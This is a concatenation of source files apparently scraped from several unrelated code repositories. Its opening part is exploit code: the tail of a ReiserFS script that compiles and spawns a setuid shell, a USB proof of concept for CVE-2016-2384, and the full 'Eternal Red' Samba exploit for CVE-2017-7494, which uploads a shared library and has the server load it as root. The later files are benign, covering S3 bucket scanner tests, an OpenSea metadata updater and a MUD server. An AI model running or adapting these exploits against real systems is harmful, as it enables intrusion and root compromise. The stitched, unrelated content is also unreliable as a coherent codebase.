if not os.path.exists('/.reiserfs_priv/xattrs'):
err('failed to locate private xattrs directory')
msg('preparing shell in /tmp')
f = open('/tmp/team-edward.c', 'w')
f.write(SHELL)
f.close()
msg('capturing pre-shell snapshot of private xattrs directory')
pre = set(os.listdir('/.reiserfs_priv/xattrs'))
msg('compiling shell in /tmp')
ret = os.system('gcc -w /tmp/team-edward.c -o /tmp/team-edward')
if ret != 0:
err('error compiling shell, you need gcc')
msg('setting dummy xattr to get reiserfs object id')
os.system('setfattr -n "user.hax" -v "hax" /tmp/team-edward')
if ret != 0:
err('error setting xattr, you need setfattr')
msg('capturing post-shell snapshot of private xattrs directory')
post = set(os.listdir('/.reiserfs_priv/xattrs'))
objs = post.difference(pre)
msg('found %s new object ids' % len(objs))
for obj in objs:
msg('setting cap_setuid/cap_setgid capabilities on object id %s' % obj)
f = open('/.reiserfs_priv/xattrs/%s/security.capability' % obj, 'w')
f.write(XATTR)
f.close()
msg('spawning setuid shell...')
os.system('/tmp/team-edward')
if __name__ == '__main__':
main()
```
#### File: 2016/CVE-2016-2384/poc.py
```python
from USB import *
from USBDevice import *
from USBConfiguration import *
from USBInterface import *
class PwnUSBDevice(USBDevice):
name = "USB device"
def __init__(self, maxusb_app, verbose=0):
interface = USBInterface(
0, # interface number
0, # alternate setting
255, # interface class
0, # subclass
0, # protocol
0, # string index
verbose,
[],
{}
)
config = USBConfiguration(
1, # index
"Emulated Device", # string desc
[ interface ] # interfaces
)
USBDevice.__init__(
self,
maxusb_app,
0, # device class
0, # device subclass
0, # protocol release number
64, # max packet size for endpoint 0
0x0763, # vendor id
0x1002, # product id
0, # device revision
"Midiman", # manufacturer string
"MidiSport 2x2", # product string
"?", # serial number string
[ config ],
verbose=verbose
)
from Facedancer import *
from MAXUSBApp import *
sp = GoodFETSerialPort()
fd = Facedancer(sp, verbose=1)
u = MAXUSBApp(fd, verbose=1)
d = PwnUSBDevice(u, verbose=4)
d.connect()
try:
d.run()
except KeyboardInterrupt:
d.disconnect()
```
#### File: 2017/CVE-2017-7494/42060.py
```python
import argparse
import os.path
import sys
import tempfile
import time
from smb.SMBConnection import SMBConnection
from smb import smb_structs
from smb.base import _PendingRequest
from smb.smb2_structs import *
from smb.base import *
class SharedDevice2(SharedDevice):
def __init__(self, type, name, comments, path, password):
super().__init__(type, name, comments)
self.path = path
self.password = password
class SMBConnectionEx(SMBConnection):
def __init__(self, username, password, my_name, remote_name, domain="", use_ntlm_v2=True, sign_options=2, is_direct_tcp=False):
super().__init__(username, password, my_name, remote_name, domain, use_ntlm_v2, sign_options, is_direct_tcp)
def hook_listShares(self):
self._listShares = self.listSharesEx
def hook_retrieveFile(self):
self._retrieveFileFromOffset = self._retrieveFileFromOffset_SMB1Unix
# This is maily the original listShares but request a higher level of info
def listSharesEx(self, callback, errback, timeout = 30):
if not self.has_authenticated:
raise NotReadyError('SMB connection not authenticated')
expiry_time = time.time() + timeout
path = 'IPC$'
messages_history = [ ]
def connectSrvSvc(tid):
m = SMB2Message(SMB2CreateRequest('srvsvc',
file_attributes = 0,
access_mask = FILE_READ_DATA | FILE_WRITE_DATA | FILE_APPEND_DATA | FILE_READ_EA | FILE_WRITE_EA | READ_CONTROL | FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES | SYNCHRONIZE,
share_access = FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
oplock = SMB2_OPLOCK_LEVEL_NONE,
impersonation = SEC_IMPERSONATE,
create_options = FILE_NON_DIRECTORY_FILE | FILE_OPEN_NO_RECALL,
create_disp = FILE_OPEN))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectSrvSvcCB, errback)
messages_history.append(m)
def connectSrvSvcCB(create_message, **kwargs):
messages_history.append(create_message)
if create_message.status == 0:
call_id = self._getNextRPCCallID()
# The data_bytes are binding call to Server Service RPC using DCE v1.1 RPC over SMB. See [MS-SRVS] and [C706]
# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream
data_bytes = \
binascii.unhexlify(b"""05 00 0b 03 10 00 00 00 74 00 00 00""".replace(b' ', b'')) + \
struct.pack('<I', call_id) + \
binascii.unhexlify(b"""
b8 10 b8 10 00 00 00 00 02 00 00 00 00 00 01 00
c8 4f 32 4b 70 16 d3 01 12 78 5a 47 bf 6e e1 88
03 00 00 00 04 5d 88 8a eb 1c c9 11 9f e8 08 00
2b 10 48 60 02 00 00 00 01 00 01 00 c8 4f 32 4b
70 16 d3 01 12 78 5a 47 bf 6e e1 88 03 00 00 00
2c 1c b7 6c 12 98 40 45 03 00 00 00 00 00 00 00
01 00 00 00
""".replace(b' ', b'').replace(b'\n', b''))
m = SMB2Message(SMB2WriteRequest(create_message.payload.fid, data_bytes, 0))
m.tid = create_message.tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcBindCB, errback, fid = create_message.payload.fid)
messages_history.append(m)
else:
errback(OperationFailure('Failed to list shares: Unable to locate Server Service RPC endpoint', messages_history))
def rpcBindCB(trans_message, **kwargs):
messages_history.append(trans_message)
if trans_message.status == 0:
m = SMB2Message(SMB2ReadRequest(kwargs['fid'], read_len = 1024, read_offset = 0))
m.tid = trans_message.tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, rpcReadCB, errback, fid = kwargs['fid'])
messages_history.append(m)
else:
closeFid(trans_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to read from Server Service RPC endpoint')
def rpcReadCB(read_message, **kwargs):
messages_history.append(read_message)
if read_message.status == 0:
call_id = self._getNextRPCCallID()
padding = b''
remote_name = '\\\\' + self.remote_name
server_len = len(remote_name) + 1
server_bytes_len = server_len * 2
if server_len % 2 != 0:
padding = b'\0\0'
server_bytes_len += 2
# The data bytes are the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.
# If you wish to understand the meanings of the byte stream, I would suggest you use a recent version of WireShark to packet capture the stream
data_bytes = \
binascii.unhexlify(b"""05 00 00 03 10 00 00 00""".replace(b' ', b'')) + \
struct.pack('<HHI', 72+server_bytes_len, 0, call_id) + \
binascii.unhexlify(b"""4c 00 00 00 00 00 0f 00 00 00 02 00""".replace(b' ', b'')) + \
struct.pack('<III', server_len, 0, server_len) + \
(remote_name + '\0').encode('UTF-16LE') + padding + \
binascii.unhexlify(b"""
02 00 00 00 02 00 00 00 04 00 02 00 00 00 00 00
00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00
""".replace(b' ', b'').replace(b'\n', b''))
m = SMB2Message(SMB2IoctlRequest(kwargs['fid'], 0x0011C017, flags = 0x01, max_out_size = 8196, in_data = data_bytes))
m.tid = read_message.tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])
messages_history.append(m)
else:
closeFid(read_message.tid, kwargs['fid'], error = 'Failed to list shares: Unable to bind to Server Service RPC endpoint')
def listShareResultsCB(result_message, **kwargs):
messages_history.append(result_message)
if result_message.status == 0:
# The payload.data_bytes will contain the results of the RPC call to NetrShareEnum (Opnum 15) at Server Service RPC.
data_bytes = result_message.payload.out_data
if data_bytes[3] & 0x02 == 0:
sendReadRequest(result_message.tid, kwargs['fid'], data_bytes)
else:
decodeResults(result_message.tid, kwargs['fid'], data_bytes)
elif result_message.status == 0x0103: # STATUS_PENDING
self.pending_requests[result_message.mid] = _PendingRequest(result_message.mid, expiry_time, listShareResultsCB, errback, fid = kwargs['fid'])
else:
closeFid(result_message.tid, kwargs['fid'])
errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))
def decodeResults(tid, fid, data_bytes):
shares_count = struct.unpack('<I', data_bytes[36:40])[0]
results = [ ] # A list of SharedDevice2 instances
offset = 36 + 52 # You need to study the byte stream to understand the meaning of these constants
for i in range(0, shares_count):
results.append(SharedDevice(struct.unpack('<I', data_bytes[offset+4:offset+8])[0], None, None))
offset += 12
for i in range(0, shares_count):
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].name = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].comments = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].path = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
max_length, _, length = struct.unpack('<III', data_bytes[offset:offset+12])
offset += 12
results[i].password = data_bytes[offset:offset+length*2-2].decode('UTF-16LE')
if length % 2 != 0:
offset += (length * 2 + 2)
else:
offset += (length * 2)
closeFid(tid, fid)
callback(results)
def sendReadRequest(tid, fid, data_bytes):
read_count = min(4280, self.max_read_size)
m = SMB2Message(SMB2ReadRequest(fid, 0, read_count))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback,
fid = fid, data_bytes = data_bytes)
def readCB(read_message, **kwargs):
messages_history.append(read_message)
if read_message.status == 0:
data_len = read_message.payload.data_length
data_bytes = read_message.payload.data
if data_bytes[3] & 0x02 == 0:
sendReadRequest(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])
else:
decodeResults(read_message.tid, kwargs['fid'], kwargs['data_bytes'] + data_bytes[24:data_len-24])
else:
closeFid(read_message.tid, kwargs['fid'])
errback(OperationFailure('Failed to list shares: Unable to retrieve shared device list', messages_history))
def closeFid(tid, fid, results = None, error = None):
m = SMB2Message(SMB2CloseRequest(fid))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, closeCB, errback, results = results, error = error)
messages_history.append(m)
def closeCB(close_message, **kwargs):
if kwargs['results'] is not None:
callback(kwargs['results'])
elif kwargs['error'] is not None:
errback(OperationFailure(kwargs['error'], messages_history))
if path not in self.connected_trees:
def connectCB(connect_message, **kwargs):
messages_history.append(connect_message)
if connect_message.status == 0:
self.connected_trees[path] = connect_message.tid
connectSrvSvc(connect_message.tid)
else:
errback(OperationFailure('Failed to list shares: Unable to connect to IPC$', messages_history))
m = SMB2Message(SMB2TreeConnectRequest(r'\\%s\%s' % ( self.remote_name.upper(), path )))
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, expiry_time, connectCB, errback, path = path)
messages_history.append(m)
else:
connectSrvSvc(self.connected_trees[path])
# Don't convert to Window style path
def _retrieveFileFromOffset_SMB1Unix(self, service_name, path, file_obj, callback, errback, starting_offset, max_length, timeout = 30):
if not self.has_authenticated:
raise NotReadyError('SMB connection not authenticated')
messages_history = [ ]
def sendOpen(tid):
m = SMBMessage(ComOpenAndxRequest(filename = path,
access_mode = 0x0040, # Sharing mode: Deny nothing to others
open_mode = 0x0001, # Failed if file does not exist
search_attributes = SMB_FILE_ATTRIBUTE_HIDDEN | SMB_FILE_ATTRIBUTE_SYSTEM,
timeout = timeout * 1000))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, openCB, errback)
messages_history.append(m)
def openCB(open_message, **kwargs):
messages_history.append(open_message)
if not open_message.status.hasError:
if max_length == 0:
closeFid(open_message.tid, open_message.payload.fid)
callback(( file_obj, open_message.payload.file_attributes, 0 ))
else:
sendRead(open_message.tid, open_message.payload.fid, starting_offset, open_message.payload.file_attributes, 0, max_length)
else:
errback(OperationFailure('Failed to retrieve %s on %s: Unable to open file' % ( path, service_name ), messages_history))
def sendRead(tid, fid, offset, file_attributes, read_len, remaining_len):
read_count = self.max_raw_size - 2
m = SMBMessage(ComReadAndxRequest(fid = fid,
offset = offset,
max_return_bytes_count = read_count,
min_return_bytes_count = min(0xFFFF, read_count)))
m.tid = tid
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, readCB, errback, fid = fid, offset = offset, file_attributes = file_attributes,
read_len = read_len, remaining_len = remaining_len)
def readCB(read_message, **kwargs):
# To avoid crazy memory usage when retrieving large files, we do not save every read_message in messages_history.
if not read_message.status.hasError:
read_len = kwargs['read_len']
remaining_len = kwargs['remaining_len']
data_len = read_message.payload.data_length
if max_length > 0:
if data_len > remaining_len:
file_obj.write(read_message.payload.data[:remaining_len])
read_len += remaining_len
remaining_len = 0
else:
file_obj.write(read_message.payload.data)
remaining_len -= data_len
read_len += data_len
else:
file_obj.write(read_message.payload.data)
read_len += data_len
if (max_length > 0 and remaining_len <= 0) or data_len < (self.max_raw_size - 2):
closeFid(read_message.tid, kwargs['fid'])
callback(( file_obj, kwargs['file_attributes'], read_len )) # Note that this is a tuple of 3-elements
else:
sendRead(read_message.tid, kwargs['fid'], kwargs['offset']+data_len, kwargs['file_attributes'], read_len, remaining_len)
else:
messages_history.append(read_message)
closeFid(read_message.tid, kwargs['fid'])
errback(OperationFailure('Failed to retrieve %s on %s: Read failed' % ( path, service_name ), messages_history))
def closeFid(tid, fid):
m = SMBMessage(ComCloseRequest(fid))
m.tid = tid
self._sendSMBMessage(m)
messages_history.append(m)
if service_name not in self.connected_trees:
def connectCB(connect_message, **kwargs):
messages_history.append(connect_message)
if not connect_message.status.hasError:
self.connected_trees[service_name] = connect_message.tid
sendOpen(connect_message.tid)
else:
errback(OperationFailure('Failed to retrieve %s on %s: Unable to connect to shared device' % ( path, service_name ), messages_history))
m = SMBMessage(ComTreeConnectAndxRequest(r'\\%s\%s' % ( self.remote_name.upper(), service_name ), SERVICE_ANY, ''))
self._sendSMBMessage(m)
self.pending_requests[m.mid] = _PendingRequest(m.mid, int(time.time()) + timeout, connectCB, errback, path = service_name)
messages_history.append(m)
else:
sendOpen(self.connected_trees[service_name])
def get_connection(user, password, server, port, force_smb1=False):
if force_smb1:
smb_structs.SUPPORT_SMB2 = False
conn = SMBConnectionEx(user, password, "", "server")
assert conn.connect(server, port)
return conn
def get_share_info(conn):
conn.hook_listShares()
return conn.listShares()
def find_writeable_share(conn, shares):
print("[+] Searching for writable share")
filename = "red"
test_file = tempfile.TemporaryFile()
for share in shares:
try:
# If it's not writeable this will throw
conn.storeFile(share.name, filename, test_file)
conn.deleteFiles(share.name, filename)
print("[+] Found writeable share: " + share.name)
return share
except:
pass
return None
def write_payload(conn, share, payload, payload_name):
with open(payload, "rb") as fin:
conn.storeFile(share.name, payload_name, fin)
return True
def convert_share_path(share):
path = share.path[2:]
path = path.replace("\\", "/")
return path
def load_payload(user, password, server, port, fullpath):
conn = get_connection(user, password, server, port, force_smb1 = True)
conn.hook_retrieveFile()
print("[+] Attempting to load payload")
temp_file = tempfile.TemporaryFile()
try:
conn.retrieveFile("IPC$", "\\\\PIPE\\" + fullpath, temp_file)
except:
pass
return
def drop_payload(user, password, server, port, payload):
payload_name = "charizard"
conn = get_connection(user, password, server, port)
shares = get_share_info(conn)
share = find_writeable_share(conn, shares)
if share is None:
print("[!] No writeable shares on " + server + " for user: " + user)
sys.exit(-1)
if not write_payload(conn, share, payload, payload_name):
print("[!] Failed to write payload: " + str(payload) + " to server")
sys.exit(-1)
conn.close()
fullpath = convert_share_path(share)
return os.path.join(fullpath, payload_name)
def main():
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description= """Eternal Red Samba Exploit -- CVE-2017-7494
Causes vulnerable Samba server to load a shared library in root context
Credentials are not required if the server has a guest account
For remote exploit you must have write permissions to at least one share
Eternal Red will scan the Samba server for shares it can write to
It will also determine the fullpath of the remote share
For local exploit provide the full path to your shared library to load
Your shared library should look something like this
extern bool change_to_root_user(void);
int samba_init_module(void)
{
change_to_root_user();
/* Do what thou wilt */
}
""")
parser.add_argument("payload", help="path to shared library to load", type=str)
parser.add_argument("server", help="Server to target", type=str)
parser.add_argument("-p", "--port", help="Port to use defaults to 445", type=int)
parser.add_argument("-u", "--username", help="Username to connect as defaults to nobody", type=str)
parser.add_argument("--password", help="Password for user default is empty", type=str)
parser.add_argument("--local", help="Perform local attack. Payload should be fullpath!", type=bool)
args = parser.parse_args()
if not os.path.isfile(args.payload):
print("[!] Unable to open: " + args.payload)
sys.exit(-1)
port = 445
user = "nobody"
password = ""
fullpath = ""
if args.port:
port = args.port
if args.username:
user = args.username
if args.password:
password = <PASSWORD>.password
if args.local:
fullpath = args.payload
else:
fullpath = drop_payload(user, password, args.server, port, args.payload)
load_payload(user, password, args.server, port, fullpath)
if __name__ == "__main__":
main()
``` |
{
"source": "0xToast/S3Scanner",
"score": 3
} |
#### File: S3Scanner/S3Scanner/exceptions.py
```python
class AccessDeniedException(Exception):
def __init__(self, message):
pass
# Call the base class constructor
# super().__init__(message, None)
# Now custom code
# self.errors = errors
class InvalidEndpointException(Exception):
def __init__(self, message):
self.message = message
class BucketMightNotExistException(Exception):
def __init__(self):
pass
```
#### File: S3Scanner/tests/TestUtils.py
```python
import random
import string
import boto3
class TestBucketService:
def __init__(self):
self.session = boto3.Session(profile_name='privileged')
self.s3_client = self.session.client('s3')
@staticmethod
def generate_random_bucket_name(length=40):
candidates = string.ascii_lowercase + string.digits
return 's3scanner-' + ''.join(random.choice(candidates) for i in range(length))
def delete_bucket(self, bucket_name):
self.s3_client.delete_bucket(Bucket=bucket_name)
def create_bucket(self, danger_bucket):
bucket_name = self.generate_random_bucket_name()
# For type descriptions, refer to: https://github.com/sa7mon/S3Scanner/wiki/Test-Buckets
if danger_bucket == 1:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers')
self.s3_client.put_bucket_acl(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers')
elif danger_bucket == 2:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AllUsers',
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AllUsers')
elif danger_bucket == 3:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantRead='uri=http://acs.amazonaws.com/groups/global/AllUsers',
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers',
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers')
elif danger_bucket == 4:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWrite='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers,'
'uri=http://acs.amazonaws.com/groups/global/AllUsers')
elif danger_bucket == 5:
self.s3_client.create_bucket(Bucket=bucket_name,
GrantWriteACP='uri=http://acs.amazonaws.com/groups/global/AuthenticatedUsers,'
'uri=http://acs.amazonaws.com/groups/global/AllUsers')
else:
raise Exception("Unknown danger bucket type")
return bucket_name
``` |
{
"source": "0xtoko/opensea-meta-updater",
"score": 3
} |
#### File: 0xtoko/opensea-meta-updater/manual_mutation.py
```python
import json
import itertools
import logging
import argparse
import os
logger = logging.getLogger(__name__)
# Process items in chunks
def chunks(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
# Save update list
def save_manual_mutation(contract_address, index, mutation):
path = f"./manual_push_mutation/{contract_address}/"
os.makedirs(os.path.dirname(path), exist_ok=True)
with open(f"./{path}/{index}.graphql", 'w') as file:
file.write(mutation)
def load_update_items(contract_address):
with open(f'update_lists/{contract_address}_item_list.json', 'r') as file:
items = json.load(file)
return sorted(items,key=lambda x: x["node"]["asset"]["tokenId"])
# Parse args
def get_script_arguments():
parser = argparse.ArgumentParser(description='Usage example: python manual_mutation.py -c "0x6c94954d0b265f657a4a1b35dfaa8b73d1a3f199"')
parser.add_argument('-c','--contract-address',required=True,type=str,help='Contract address of NFT collection.')
parser.add_argument('-b','--batch_size',type=int,default=1000,help="(optional) Number of Queues to batch in one request on '--update_metadata'. Default is 1000.")
args = parser.parse_args()
logger.info(args)
return args
def create_mutation(contract_address, items, batch_size):
index = 0
for item_chunk in chunks(items, batch_size):
index += 1
mutation_string = ""
# Create query detail
for item in item_chunk:
try:
item_id = item["node"]["asset"]["relayId"]
alias = "_" + str(item["node"]["asset"]["tokenId"])
except:
logger.warning(f'Item ID not Found for: {item["node"]["asset"]["name"]})')
mutation_string += f'{alias}: assets {{refresh(asset: "{item_id}")}}'
mutation = f'mutation {{{mutation_string}}}'
# uri_query = query + "&variables="
save_manual_mutation(contract_address, index, mutation)
def main():
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Manual Mutation Generator] - %(levelname)s - %(message)s', level=logging.INFO)
args = get_script_arguments()
items = load_update_items(args.contract_address)
create_mutation(args.contract_address, items, args.batch_size)
logger.info("Completed")
if __name__ == '__main__':
main()
```
#### File: 0xtoko/opensea-meta-updater/update.py
```python
import argparse
import json
import logging
import itertools
import requests
import time
logger = logging.getLogger(__name__)
# Process items in chunks
def chunks(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
# Save update list
def save_update_items(contract_address, items):
with open(f'update_lists/{contract_address}_item_list.json', 'w') as file:
json.dump(items, file)
# Load update list
def load_update_items(contract_address):
with open(f'update_lists/{contract_address}_item_list.json', 'r') as file:
items = json.load(file)
return sorted(items,key=lambda x: x["node"]["asset"]["tokenId"])
# load query from file
def load_gql_query(file_name):
with open(f'query/{file_name}', 'r') as file:
query = file.read()
return query
# Parse args
def get_script_arguments():
parser = argparse.ArgumentParser(description='Usage example: python update.py --create-list --update_metadata -c "0x6c94954d0b265f657a4a1b35dfaa8b73d1a3f199"')
parser.add_argument('--create-list',action='store_true',help='This creates a json file with necessary data (metadata & item ID) to request updates on metadata in Opensea. This should only used once per contract unless new NFTs are minted. Requires: "--contract_address".')
parser.add_argument('--update_metadata',action='store_true',help='POST metadata update queue to Opensea. Requires: "--contract_address".')
parser.add_argument('-c','--contract-address',required=True,type=str,help='Contract address of NFT collection.')
parser.add_argument('-b','--batch_size',type=int,default=1000,help="(optional) Number of Queues to batch in one request on '--update_metadata'. Default is 1000.")
# parser.add_argument('--cool-down',type=int,help='(optional) Seconds to wait when API rate limit is reached.')
# parser.add_argument('--delay',type=int,help='(optional) Interval of each API call.')
args = parser.parse_args()
logger.info(args)
return args
# Query collectionSlug and total number of items from Contract address
def get_collection_detail(contract_address, cool_down=0.2):
url = "https://api.opensea.io/graphql/"
# bypass cloudflare
header={
"Content-Type": "application/json",
"User-Agent": "PostmanRuntime/7.26.8"
}
# Graphql Query: Get collectionSlug
slug_query = load_gql_query("slug_query.graphql")
slug_variables = {
"query": f"{contract_address}"
}
slug_param = {'query': slug_query, 'variables': slug_variables}
# Make http POST
slug_response = requests.post(url, json=slug_param, headers=header)
if slug_response.status_code != 200:
logger.warning(slug_response.text)
logger.warning("Terminating Process: Check contract address")
return ((),)
try:
slug_data = slug_response.json()
slug_result = slug_data["data"]["collections"]["edges"][0]
collection_slug = slug_result["node"]["slug"]
except:
logger.warning("Terminating Process: No CollectionSlug Found")
return((),)
logger.info(f"Found Collection: {collection_slug}")
# wait for rate limit cooldown
time.sleep(cool_down)
# Graphql Query: Get number of items in collection
count_query = load_gql_query("collection_item_count_query.graphql")
count_variables = {
"collections": [f"{collection_slug}"]
}
count_param = {'query': count_query, 'variables': count_variables}
# Make http POST
count_response = requests.post(url, json=count_param, headers=header)
if count_response.status_code != 200:
logger.warning(count_response.text)
logger.warning("Terminating Process: POST Request Error")
return ((),)
try:
count_data = count_response.json()
count_result = count_data["data"]["search"]["totalCount"]
except:
logger.warning("Terminating Process: No totalCount Found")
return((),)
logger.info(f"Total items in Collection: {count_result}")
return (collection_slug, count_result)
# This will create update list of collection which includes data needed to queue metadata update
def create_items_list(collection_slug, total_count, limit, cool_down=0.2, delay=1):
complete_items = []
total_null_count = 0
url = "https://api.opensea.io/graphql/"
next_curser = ""
has_next_page = True
# bypass cloudflare
header={
"Content-Type": "application/json",
"User-Agent": "PostmanRuntime/7.26.8"
}
while has_next_page:
time.sleep(delay)
query = load_gql_query("asset_search_list_pagination_query.graphql")
variables = {
"collections": [
f"{collection_slug}"
],
"count": limit,
"cursor": f"{next_curser}"
}
param = {'query': query, 'variables': variables}
# Flag for http request result
success = False
while not success:
# Make http POST
response = requests.post(url, json=param, headers=header)
# Check for HTTP error
if response.status_code != 200:
logger.warning(response.text)
# Rate Limit Cooldown Counter
for _ in range(cool_down, 0, -1):
time.sleep(1)
# Request Success: Escape HTTP request loop
else:
success = True
try:
data = response.json()
search_result = data["data"]["search"]
items = search_result["edges"]
# Remove null assets
filtered_items = list(filter(lambda x: x["node"]["asset"] != None, items))
# Log number of null assets
if len(filtered_items) < len(items):
null_count = len(items)-len(filtered_items)
total_null_count += null_count
logger.warning(f"Found {null_count} null Asset.")
complete_items.extend(filtered_items)
# Check if next page is available
has_next_page = search_result["pageInfo"]["hasNextPage"]
if has_next_page:
next_curser = search_result["pageInfo"]["endCursor"]
except:
logger.warning(f"{response.text}")
logger.warning("Error Ignored")
has_next_page = False
logger.info(f"{len(complete_items)}/{total_count} items completed")
logger.info(f"{total_null_count} items returned 'null'")
return complete_items
# This will queue metadata update to Opensea
def queue_metadata_update(items, batch_size, cool_down=3, delay=3):
url = "https://api.opensea.io/graphql/"
# bypass cloudflare
header={
"Content-Type": "application/json",
"User-Agent": "PostmanRuntime/7.26.8"
}
total_update_count = 0
total_fail_count = 0
# Batch items to send in one request
for item_chunk in chunks(items, batch_size):
query_string = ""
# Create query detail
for item in item_chunk:
try:
item_id = item["node"]["asset"]["relayId"]
alias = "_" + str(item["node"]["asset"]["tokenId"])
except:
logger.warning(f'Item ID not Found for: {item["node"]["asset"]["name"]})')
query_string += f'{alias}: assets {{refresh(asset: "{item_id}")}}'
query = f'mutation {{{query_string}}}'
param = {'query': query}
# Flag for http request result
success = False
while not success:
# Make http POST
response = requests.post(url, json=param, headers=header)
# Check for HTTP error
if response.status_code != 200:
logger.warning(f"Response HTML:\n{response.text}")
logger.info(f"Retrying request in {cool_down} second(s).")
# Rate Limit Cooldown Counter
for _ in range(cool_down, 0, -1):
time.sleep(1)
# Request Success: Escape HTTP request loop
else:
success = True
fail_count = 0
# Parse response to check for unsuccessful update
try:
data = response.json()
results = data["data"]
for result_alias in results:
status = results[result_alias]["refresh"]
if status != True:
logger.warning(f"Failed to queue item with token id: {result_alias[1:]}")
fail_count += 1
except:
logger.warning("Failed to parse queue result json")
time.sleep(delay)
# Show progress
total_update_count += len(item_chunk)-fail_count
logger.info(f"Queued Update: {total_update_count}/{len(items)}")
logger.info(f"Successfully Queued {len(items)-total_fail_count}/{len(items)}")
def main():
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Initialize] - %(levelname)s - %(message)s', level=logging.INFO)
args = get_script_arguments()
if args.create_list:
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Create List] - %(levelname)s - %(message)s', level=logging.INFO,force=True)
(collection_slug, total_count) = get_collection_detail(args.contract_address)
items = create_items_list(collection_slug, total_count, 100) #limit locked to 100. 100 max.
save_update_items(args.contract_address,items)
logger.info(f"Successfully Created and Saved {collection_slug}'s Items List")
if args.update_metadata:
logging.basicConfig(format='%(asctime)s - Opensea Meta Updater - [Post Update] - %(levelname)s - %(message)s', level=logging.INFO,force=True)
items = load_update_items(args.contract_address)
queue_metadata_update(items, args.batch_size)
if __name__ == '__main__':
main()
``` |
{
"source": "0xtr/minimud_python",
"score": 3
} |
#### File: 0xtr/minimud_python/main.py
```python
import random
import selectors
import socket
import sys
import pdb
from src.io import IncomingHandler
from src.io.MessageQueue import MessageQueue
from src.sqlitehelper import SQLiteHelper
# debugging
# pdb.set_trace()
port = random.randint(5000, 6000)
print("Use port " + str(port) + " for connections\n")
# open the sqlite3 dbs
dbManager = SQLiteHelper.SQLDBConnector()
assert dbManager.connectedToAllDatabases
# create the master socket
listensock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listensock.setblocking(0)
# bind it to our chosen port
try:
listensock.bind(("", port))
except Exception as e:
print(e.args)
sys.exit(1)
# set listener for connections
listensock.listen()
def accept(sock, mask):
newsock, address = sock.accept()
newsock.setblocking(False)
print("connection from " + str(newsock) + " at " + str(address))
MessageQueue.initQueue(newsock)
selector.register(newsock, selectors.EVENT_READ, read)
# TODO: welcome them nicely
def read(sock, mask):
IncomingHandler.incoming_handler(sock)
# TODO: store selector in class
selector = selectors.DefaultSelector()
selector.register(listensock, selectors.EVENT_READ, accept)
while True:
events = selector.select()
for key, mask in events:
callback = key.data
callback(key.fileobj, mask)
```
#### File: src/io/CommandInterpreter.py
```python
from enum import Enum, auto
def get_command_info(command):
newCommand = Command()
commandList = Command.getCompleteList()
for commandType in list(commandList):
commands = commandList[commandType]
if command in commands.values():
newCommand.type = commandType
newCommand.subtype = commands[command]
break
print("newCommand: " + str(newCommand.type))
return newCommand
def get_available_commands():
num = 0
commands = Command.getCompleteList()
for i in commands.keys():
num += len(commands[i])
print("command num is " + num)
return num
class Movement(Enum):
DIR_NORTH = auto()
DIR_EAST = auto()
DIR_SOUTH = auto()
DIR_WEST = auto()
DIR_UP = auto()
DIR_DOWN = auto()
DIR_NORTHEAST = auto()
DIR_SOUTHEAST = auto()
DIR_SOUTHWEST = auto()
DIR_NORTHWEST = auto()
DIR_NOT = auto()
class CommandTypes(Enum):
MOVEMENT = auto()
ROOM_CHANGE = auto()
